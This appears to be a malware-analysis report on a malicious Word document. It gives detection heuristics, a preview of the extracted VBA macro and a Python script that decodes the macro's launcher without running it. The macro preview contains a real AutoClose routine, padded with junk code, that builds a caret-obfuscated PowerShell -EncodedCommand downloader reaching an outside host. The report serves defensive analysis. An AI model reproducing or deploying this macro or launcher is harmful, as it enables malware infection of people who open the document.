MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoClose macro and a Shell() call indicate an attempt to execute arbitrary code when the document is closed. The ClamAV detection name 'Doc.Malware.Pwshell-6700199-0' points to a PowerShell-based payload, and the extracted macro source confirms it: the string assigned to LIxDwIBaCaiUdUwibomEBaiOnAaygjYyZSaTAt builds `d.exe /c` (the `c` comes from Chr(70 + 9 + 1 + 5 + 4 + 6 + 4), i.e. Chr(99); this is most plausibly the tail of `cmd.exe /c`, with the leading characters assembled elsewhere in the macro) followed by a caret-obfuscated `powershell.exe -EC <Base64>`. cmd.exe strips the carets before the line runs, and -EC is the usual abbreviation of -EncodedCommand, whose argument is Base64 of UTF-16LE text. Decoding the visible Base64 fragment yields `(New-Object System.Net.WebClient).DownloadFile("http://leopa` before the preview is cut off, so the payload is a file downloader; the full host name and the rest of the command are not recoverable from this page. The bulk of the macro body (Right/Left/Sqr assignments on names that are never defined, under On Error Resume Next) appears to be junk code inserted to defeat static scanning. The generic wording of the legacy WordBasic auto-exec heuristic ('no modern VBA project was recovered') contradicts the recovered macros.bas and should be read as corroborating evidence only. The truncated preview and the unresolved download URL are what keep the confidence score from being higher.
Heuristics (6)
- ClamAV: Doc.Malware.Pwshell-6700199-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Pwshell-6700199-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro. Word runs AutoClose automatically when the document is closed, so merely closing the lure triggers the payload.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (The "no modern VBA project was recovered" clause is the heuristic's generic description; for this sample it is contradicted by the extracted macros.bas below.)
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three URLs found here, in document text (OLE body), are OOXML schema namespace identifiers present in ordinary Office files; they are not download or C2 locations:
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 83614 bytes | 75d57b021e859414f981606a82427a7c9febe924cd875166fbbce57c04d12cd5 |

Preview script (first 1,000 lines of the extracted script; the listing stops where the page truncates it):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const FaMOcitAnaHyRBAKoiyByisAqazoNuWYTEl = 0
Sub AutoClose()
On Error Resume Next
Dim daViMoLAPOfufILuBYxERIz(3)
daViMoLAPOfufILuBYxERIz(0) = Right(NqYSERAcixeTijuGY, 4024)
daViMoLAPOfufILuBYxERIz(1) = Sqr(3)
daViMoLAPOfufILuBYxERIz(2) = Left(NqYSERAcixeTijuGY, 4024)
Dim muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(3)
Dim lIQEmiGUGosigDehojELOSInIxeja(3)
lIQEmiGUGosigDehojELOSInIxeja(0) = Right(salIPigAgoqURIbARIc, 3316)
lIQEmiGUGosigDehojELOSInIxeja(1) = Sqr(8)
lIQEmiGUGosigDehojELOSInIxeja(2) = Left(salIPigAgoqURIbARIc, 3316)
Dim KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(3)
KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(0) = Right(aeHpaSEBPQ, 6460)
KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(1) = Sqr(2)
KAnyaYaysIJquGakomyzCEymovEHocnepIwibos(2) = Left(aeHpaSEBPQ, 6460)
muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(0) = Right(cezoAQiTYcIiOw, 9295)
muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(1) = Sqr(2)
muwApSikOlUQIiaPOioKOmewONeveiuCUlUj(2) = Left(cezoAQiTYcIiOw, 9295)
Dim lIcYnUbavUiEspwINYziCabuRulyvGUiU(3)
Dim hEkUGoSUTeFIcnITjjUHiaEPiqUr(3)
hEkUGoSUTeFIcnITjjUHiaEPiqUr(0) = Right(peLoLUxugekAgoZuxYGUxedI, 2202)
hEkUGoSUTeFIcnITjjUHiaEPiqUr(1) = Sqr(9)
hEkUGoSUTeFIcnITjjUHiaEPiqUr(2) = Left(peLoLUxugekAgoZuxYGUxedI, 2202)
Dim PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(3)
PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(0) = Right(iEdiCAkiQUDiiy, 1371)
PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(1) = Sqr(10)
PEsAPiwitIdisYsEjUHELaZIBuqUmvatY(2) = Left(iEdiCAkiQUDiiy, 1371)
Dim pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(3)
pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(0) = Right(JEjIgZELaKUmoDuREdY, 1598)
pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(1) = Sqr(1)
pAJEjAQDURyqEPEsogYVYHITOTEVejaSiQUlE(2) = Left(JEjIgZELaKUmoDuREdY, 1598)
lIcYnUbavUiEspwINYziCabuRulyvGUiU(0) = Right(cUFuhArElOgOLErOsabiVAk, 8961)
lIcYnUbavUiEspwINYziCabuRulyvGUiU(1) = Sqr(2)
Dim FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(3)
FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(0) = Right(siBeDaFisoSAfOveK, 6891)
FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(1) = Sqr(3)
FelOtOPozumuCUZoTeRHuqiLUDuFYxUMYN(2) = Left(siBeDaFisoSAfOveK, 6891)
Dim DutylUwWAxucakmYhigoPenyjeaiP(3)
DutylUwWAxucakmYhigoPenyjeaiP(0) = Right(foGeMyBUWunO, 8525)
DutylUwWAxucakmYhigoPenyjeaiP(1) = Sqr(1)
DutylUwWAxucakmYhigoPenyjeaiP(2) = Left(foGeMyBUWunO, 8525)
lIcYnUbavUiEspwINYziCabuRulyvGUiU(2) = Left(cUFuhArElOgOLErOsabiVAk, 8961)
Dim FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(3)
FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(0) = Right(NORiJIrIVApIlUV, 1662)
FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(1) = Sqr(10)
FEJYkafiNyZAZARYbAXahyhaAjEvybuHUJALef(2) = Left(NORiJIrIVApIlUV, 1662)
Dim xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(3)
xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(0) = Right(iipUaucOLIMaMeoKAqABiV, 8095)
xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(1) = Sqr(3)
xoBIhInYCydiwiQAtuUCaByxoFAgeJurECE(2) = Left(iipUaucOLIMaMeoKAqABiV, 8095)
LIxDwIBaCaiUdUwibomEBaiOnAaygjYyZSaTAt = "d.exe /" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + " p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + "^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + "^A^A^6^A^C^8^A^L^w^B^s^A^G^U^A^b^w^B^w^A^G^E^A^Z^A"
Dim ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(3)
ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(0) = Right(ideMOWeTYNYsoiezeZIl, 7164)
ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(1) = Sqr(7)
ZCOtaGGyfnOBORObaNOmOGAwoMIDYDOi(2) = Left(ideMOWeTYNYsoiezeZIl, 7164)
Dim GaQeDIRIrODAwUbAMorIzxAaIVyKuVIKOTID(3)
GaQeDIRIrODAwUbAMorIzxAaIVyKuVIKOTID(0) = Right(wuwIDyQACASENIxojzUrYf, 1148)
GaQeDIRIrODAwUbAMorIzxAaIV ... (truncated)
```
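As an added worked example (not part of the original report, and not code from oletools, ClamAV or any other tool the report names), the Python below reconstructs the launcher string from the LIxDwIBaCaiUdUwibomEBaiOnAaygjYyZSaTAt assignment in the macro preview above and decodes its -EC payload the way the operating system would: evaluate the VBA string concatenation, strip cmd.exe carets, pull the argument after -EC, and decode Base64 to UTF-16LE text. The VBA right-hand side is copied verbatim from the page; the tiny expression evaluator handles only string literals and Format(Chr(n + n + ...)), which is all this sample uses, and the -EC matching covers the common -EC / -Enc / -EncodedCommand spellings (an assumption, not a full reimplementation of powershell.exe's argument parser). Because the preview truncates the Base64, the last complete UTF-16LE code unit is followed by one dangling byte, which the decoder reports separately instead of silently dropping it.

```python
"""De-obfuscate the cmd/PowerShell launcher assembled by the AutoClose macro."""
import base64
import re

# Right-hand side of the LIxDw... assignment, copied verbatim from the macro
# preview (it contains no single quotes or backslashes, so a plain Python
# string holds it unchanged).
VBA_RHS = (
    '"d.exe /" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + '
    '" p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g'
    '^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A'
    '^d^A^A^u^A^F^" + Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + '
    '"^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u'
    '^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^" + '
    'Format(Chr(70 + 9 + 1 + 5 + 4 + 6 + 4)) + '
    '"^A^A^6^A^C^8^A^L^w^B^s^A^G^U^A^b^w^B^w^A^G^E^A^Z^A"'
)

# Tokens this evaluator understands: a double-quoted literal, or
# Format(Chr(<integers joined by '+'>)). Anything else is ignored.
TOKEN = re.compile(r'"([^"]*)"|Format\(Chr\(([\d\s+]+)\)\)')


def eval_vba_concat(rhs: str) -> str:
    """Evaluate a VBA expression made of string literals and
    Format(Chr(n + n + ...)) joined with '+'. The Chr arithmetic is summed
    here rather than executed, so no macro code ever runs."""
    out = []
    for literal, chr_arg in TOKEN.findall(rhs):
        if chr_arg:
            out.append(chr(sum(int(n) for n in chr_arg.split("+"))))
        else:
            out.append(literal)
    return "".join(out)


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^x' becomes 'x' (so '^^' becomes '^')."""
    return re.sub(r"\^(.?)", r"\1", cmdline)


# Assumption: the payload follows -EC / -Enc / -EncodedCommand (case-insensitive).
ENCODED_ARG = re.compile(r"(?<!\S)-e(?:c|nc\w*)?\s+(\S+)", re.IGNORECASE)


def extract_encoded_command(cmdline: str) -> str:
    """Return the argument after the -EncodedCommand switch, or '' if absent."""
    m = ENCODED_ARG.search(cmdline)
    return m.group(1) if m else ""


def decode_encoded_command(b64: str) -> tuple[str, bytes]:
    """Decode an -EncodedCommand payload (Base64 of UTF-16LE text).
    Missing padding is restored, and any odd trailing byte left by a
    truncated payload is returned separately instead of being dropped."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    even = len(raw) - len(raw) % 2
    return raw[:even].decode("utf-16-le"), raw[even:]


def deobfuscate(rhs: str = VBA_RHS) -> dict:
    """Full chain: VBA concat -> caret stripping -> -EC argument -> UTF-16LE text."""
    launcher = strip_carets(eval_vba_concat(rhs))
    encoded = extract_encoded_command(launcher)
    decoded, dangling = decode_encoded_command(encoded)
    return {"launcher": launcher, "encoded": encoded,
            "decoded": decoded, "dangling": dangling}


if __name__ == "__main__":
    result = deobfuscate()
    print("launcher :", result["launcher"][:40], "...")
    print("decoded  :", result["decoded"])
    if result["dangling"]:
        print("dangling :", result["dangling"], "(payload truncated in the preview)")
```

The decoded text stops at `http://leopa` plus a dangling `d` byte, which is exactly where the page truncates the macro; the host name is not recoverable from this report and nothing here should be read as completing it. Running the full 83614-byte macros.bas through the same chain would be the next step.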